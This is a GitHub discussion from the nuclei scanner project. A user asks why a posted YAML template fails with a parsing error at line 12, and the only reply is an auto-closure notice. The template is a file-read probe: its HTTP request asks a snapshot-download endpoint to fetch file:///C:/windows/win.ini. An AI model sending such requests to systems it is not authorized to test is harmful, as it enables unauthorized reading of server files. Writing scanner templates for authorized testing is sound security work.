### DISCUSSION TITLE
why "did not find expected key"

### DISCUSSION THREAD

**Discussion by YanXi9999** [projectdiscovery/nuclei#5718] [General]
id: template-id
info:
  name: Template Name
  author: Douliyoutang
  severity: info
  description: description
  reference:
    - https://
  tags: tags
  
variables:
  a1: "{{RootURL}}/eps/api/triggerSnapshot/download" 
  a2: "{{to_upper("{{md5(a1)}}")}}" 

http:
  - raw:
      - |+
        GET /eps/api/triggerSnapshot/download?token={{a2}}&fileUrl=file:///C:/windows/win.ini&fileName=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
    matchers:
      - type: status
        status:
          - 200

why  "yaml: line 12: did not find expected key" ?

**Comment by dogancanbakir** [comment]
This discussion closed automatically due to inactivity. Feel free to reopen or start new if still relevant.
